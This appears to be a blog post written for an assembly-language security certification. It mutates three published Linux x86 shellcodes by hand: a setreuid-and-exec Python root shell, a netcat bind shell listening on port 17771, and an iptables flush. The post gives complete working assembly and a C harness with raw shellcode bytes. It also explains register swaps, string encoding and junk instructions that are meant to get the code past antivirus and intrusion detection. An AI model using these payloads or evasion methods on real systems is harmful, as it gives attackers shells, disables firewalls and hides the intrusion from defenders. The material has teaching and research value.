This post is about modifying shellcode by replacing instructions it uses without changing the overall logic of the given shellcode. This is most often done to evade antivirus and intrusion detection systems.

There are actually polymorphic engines in existence that can take a program and transform it so that the modified version consists of different code yet operates with the same functionality, but in this post we will be doing everything manually.

Sample #1: setreuid() + exec /usr/bin/python - 54 bytes by Ali Razmjoo

The first sample from the shell-storm.org I will use here is the shellcode that starts the Python interpreter as root. On the referenced page the shellcode is presented using AT&T syntax. Here is the version translated to the Intel syntax with my comments (I renamed the first and last labels so that their purpose is more obvious):

section .text
    global _start

_start:
    ; Set real u/gid to root
    xor eax, eax
    mov al, 0x46
    xor ebx, ebx
    xor ecx, ecx
    int 0x80
    jmp .data

.code:
    pop ebx             ; Load the address to the string into ebx
    xor eax, eax
    mov [ebx+15], al    ; Put 0 byte at the end of the string
    mov [ebx+16], ebx   ; Copy the address to the string to 4 bytes after the string
    mov [ebx+20], eax   ; Copy zeroes after the address to the string
    mov al, 11          ; execve syscall #
    lea ecx, [ebx+16]   ; args, the 2rd argument
    lea edx, [ebx+20]   ; env vars, the 3rd argument
    int 0x80

.data:
    call .code
    python: db "/usr/bin/python"

Note that the above Assembly program compiles, but does not work by itself because of the self-modifying part. Remember that modifying the executable .text section at runtime is a no-no and leads to a segmentation fault. To test the shellcode we have to employ a framing C program. The shellcode itself can be copied from the referenced above web page or regenerated using the scdump tool after building an executable from the above source code.

#include <stdio.h>
#include <string.h>

unsigned char shellcode[] = "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16"
"\x5b\x31\xc0\x88\x43\x0f\x89\x5b\x10\x89\x43\x14\xb0\x0b\x8d\x4b\x10\x8d\x53"
"\x14\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x79"
"\x74\x68\x6f\x6e"; 

int main(void)
{
    printf("Shellcode length: %d\n", strlen(shellcode));
    (*(void(*)(void))shellcode)();
    return 0;
}

Testing the shellcode

At first, I wanted to do a step by step modification of every couple instructions preserving the overall functionality, but then, after reviewing the given shellcode architecture, I realized that it is quite inefficient. So I decided to rewrite most of the code employing a couple of shellcode-shortening techniques I learned while taking the SLAE course. Follows my modified copy of the shellcode with some comments:

section .text
    global _start

_start:
    ; Set real u/gid to root
    push byte 0x46
    pop eax
    xor ebx, ebx
    xor ecx, ecx
    int 0x80

    push ebx            ; Push null bytes to terminate the string
    push 0x6e6f6874     ; Push the //usr/bin/python string
    push 0x79702f6e     ; onto the stack
    push 0x69622f72
    push 0x73752f2f
    mul ebx             ; Zero out EAX and EDX as a result of multiplication by 0
    mov ebx, esp        ; String address, execve 1st argument - program name
    mov al, 11          ; execve syscall #
    int 0x80

First off all note that this shellcode is 38 bytes long vs 54 bytes of the original one, which is a 30% (!) reduction. Here is the list of tricks I employed to reduce the shellcode size:

1) In the beginning the EAX register needs to be set to the 0x46, which is the syscall code of the setreuid. For that the original shellcode uses this sequence, which takes 4 bytes:

xor eax, eax
mov al, 0x46

To shave off a byte I replaced it with the following equivalent:

push byte 0x46
pop eax

2) The original shellcode uses the jmp-call-pop technique for accessing the data in the location-independent manner. I replaced this approach with pushing the string data directly onto the stack. This change alone saved us the most number of bytes.

3) The original shellcode contains code that was setting unnecessary arguments to execve syscall:

lea ecx, [ebx+16]
lea edx, [ebx+20]

In reality both ECX and EDX registers (2nd and 3rd arguments to execve syscall correspondingly) can be set to 0.

4) Lastly, to set EAX and EDX registers to 0 in one swoop I used the multiplication instruction:

mul ebx

that stores the quotient into EAX and remainder into EDX. And since the divisor (EBX) was 0, both the quotient and remainder were set to 0.

To convert the //usr/bin/python string to instructions that are used to push the string onto the stack I used the str4sc tool. I had to add an extra slash to the path so that the string length became a multiple of 4, a condition necessary for storing null-free strings on the stack.

Sample #2: /bin/nc -le /bin/sh -vp 17771 - 58 bytes by Oleg Boytsev

Here comes our second shell-storm sample - the netcat assisted bind shell:

global _start
section .text
 _start:
    xor eax, eax
    xor edx, edx
    push eax
    push 0x31373737     ;-vp17771
    push 0x3170762d
    mov esi, esp

    push eax
    push 0x68732f2f     ;-le//bin//sh
    push 0x6e69622f
    push 0x2f656c2d
    mov edi, esp

    push eax
    push 0x636e2f2f     ;/bin//nc
    push 0x6e69622f
    mov ebx, esp

    push edx
    push esi
    push edi
    push ebx
    mov ecx, esp
    mov al,11
    int 0x80

There is nothing complicated about this shellcode. All it does is just start the Netcat listening on port 17771 and serving shell to anyone connecting to that port. From the get-go I found only one way to reduce the overall size by 1 byte: replacing all

push eax

instructions with

push edx

And then replacing the

xor eax, eax
...
mov al, 11

sequence (instructions are actually divided by the code) with

push byte 11
pop eax

Here is the result of the above manipulations:

global _start
section .text
 _start:
    xor edx, edx
    push edx
    push 0x31373737     ;-vp17771
    push 0x3170762d
    mov esi, esp

    push edx
    push 0x68732f2f     ;-le//bin//sh
    push 0x6e69622f
    push 0x2f656c2d
    mov edi, esp

    push edx
    push 0x636e2f2f     ;/bin//nc
    push 0x6e69622f
    mov ebx, esp

    push edx
    push esi
    push edi
    push ebx
    mov ecx, esp
    push byte 11
    pop eax
    int 0x80

Next, I will continue to mutate the shellcode, trying not to increase the overall size. One thing we can begin with is playing around the strings we have at our disposal. We can modify them in such a way that overall functionality stays the same. Remember that length for each string must stay a multiple of 4. Here is how I modified the strings:

-vp17771        ->    -lp17771
-le//bin//sh    ->    -ve/bin///sh
/bin//nc        ->    //bin/nc

In the wild I would also change the port number, but for the sake of keeping functionality 100% unchanged I do not do it here.

And the last change that will complicate AV detection will be replacing one register with another whenever possible throughout the code. This will work because every instruction translates to a different sequence of bytes, and that is exactly what we need. Follows the map of replacements I made in the original shellcode and then the whole body of the modified shellcode:

mov esi, esp -> mov eax, esp
mov edi, esp -> mov esi, esp
push esi     -> push eax
push edi     -> push esi

The final version:

global _start
section .text
 _start:
    xor edx, edx
    push edx
    push 0x31373737     ; -lp17771
    push 0x31706c2d
    mov eax, esp

    push edx
    push 0x68732f2f     ; -ve/bin///sh
    push 0x2f6e6962
    push 0x2f65762d
    mov esi, esp

    push edx
    push 0x636e2f6e     ;//bin/nc
    push 0x69622f2f
    mov ebx, esp

    push edx
    push eax
    push esi
    push ebx
    mov ecx, esp
    push byte 11
    pop eax
    int 0x80

I could continue modifying the shellcode to approach zero pattern correlation, but the size of the shellcode will inevitably go up. I will sacrifice the size of the shellcode mutating our last sample and show how some very simple steps can help you on the AV evasion path.

Sample #3: Linux/x86 - iptables --flush - 43 bytes by Hamza Megahed

The designation of the last shellcode sample I will analyze in this post is to flush all iptables rules. Here is the original listing translated to Intel syntax:

section .text global _start

_start: xor eax, eax push eax push word 0x462d mov esi, esp push eax push 0x73656c62 push 0x61747069 push 0x2f6e6962 push 0x732f2f2f mov ebx, esp push eax push esi push ebx mov ecx, esp mov edx, eax mov al, 0xb int 80h

All the shellcode does is call the /sbin/iptables with -F flag.

A couple notes before I begin mutating the code. In this case I will not try to keep the shellcode from growing. Quite the opposite, I will expand a line of code into two or more lines. The only limit that I am going to stick to is that the resulted shellcode mutant must not exceed 150% of the original shellcode size.

Despite of what I've just said, I couldn't stop myself from decreasing the shellcode size by 1 byte first =). All in all this change helps us to achieve the end goal of changing the shellcode structure. To shave the byte off I replaced EAX with EDX in the following two instructions:

xor eax, eax

push eax

And to make the shellcode work again, I removed

mov edx, eax

and replaced

mov al, 0xb

with

push 0xb
pop eax

The line I removed zeroed out EDX, which was unneeded after previous modification. EDX is all 0s already at that point. And the replacement was just an equivalent of loading 0xb (execve syscall #) into EAX that doesn't depend on EAX being zeroed first.

Here is the intermediate result incorporating the above changes:

section .text
    global _start

_start:
    xor edx, edx
    push edx
    push word 0x462d
    mov esi, esp
    push edx
    push 0x73656c62
    push 0x61747069
    push 0x2f6e6962
    push 0x732f2f2f
    mov ebx, esp
    push edx
    push esi
    push ebx
    mov ecx, esp
    push 0xb
    pop eax
    int 80h

Now, let me show how with a little imagination you can expand any instruction, thus modifying the underlying opcodes (but be careful to not add null or other bad chars relevant to your case):

1) The third line pushes the -F string onto the stack. We can expand it in some fancy way:

mov bx, 0x2316
add bx, 0x2317
push bx

2) Now, why don't we apply some very lame encryption by manually subtracting 1 from every byte of the ///sbin/iptables string, and then dynamically add 1 to every byte, when it is already on the stack? Factum dictum. The modified part of the code follows:

    push 0x72646b61
    push 0x60736F68
    push 0x2e6d6861
    push 0x722e2e2e
    mov ebx, esp
; Decryption
    mov esi, esp
    mov edi, esp
    mov cl, 16
.decrypt:
    lodsb
    add eax, 1
    stosb
    loop .decrypt

3) I'd be happy to continue bubbling up the code, but at this point the initial 43 bytes of code became 62 bytes, which is just 2 bytes short of the 150% limit. To not waste those 2 bytes and mutate the code a little bit more we can insert a couple of nop-equivalents close to the end of the code. For that purpose I used the std and cld instructions that do not affect anything unless you are working with string instructions.

The final, working version of mutated shellcode:

section .text
    global _start

_start:
    xor edx, edx
    push edx
    mov bx, 0x2316
    add bx, 0x2317
    push bx
    mov ebp, esp
    push edx
    push 0x72646b61
    push 0x60736F68
    push 0x2e6d6861
    push 0x722e2e2e
    mov ebx, esp
; Decryption 
    mov esi, esp
    mov edi, esp
    mov cl, 16
.decrypt:
    lodsb
    add eax, 1
    stosb
    loop .decrypt
    push edx
    std
    push ebp
    cld
    push ebx
    mov ecx, esp
    push 0xb
    pop eax
    int 80h

And to make sure it is still working you can build it, assuming that your iptables do not contain any rules (as, by default, is the case on Kali Linux) using the following commands:

nasm -f elf ipt2.asm && ld -o ipt2 ipt2.o
iptables -A INPUT -p tcp --dport 22 -j ACCEPT && iptables -L -vn
./ipt2 && iptables -L -vn

After running the second command you should see a rule added to the INPUT chain of the filter table. After running the third command the rule should disappear (flushed by our code).

This blog post was created to fulfill the requirements of the SecurityTube Linux Assembly Expert certification. Student id: SLAE-685.

The source files created while completing the assignment can be found in my GitHub repository.

Oleg's Web Log

Mutating existing shellcodes (SLAE, Assignment #6)

Sample #1: setreuid() + exec /usr/bin/python - 54 bytes by Ali Razmjoo

Sample #2: /bin/nc -le /bin/sh -vp 17771 - 58 bytes by Oleg Boytsev

Sample #3: Linux/x86 - iptables --flush - 43 bytes by Hamza Megahed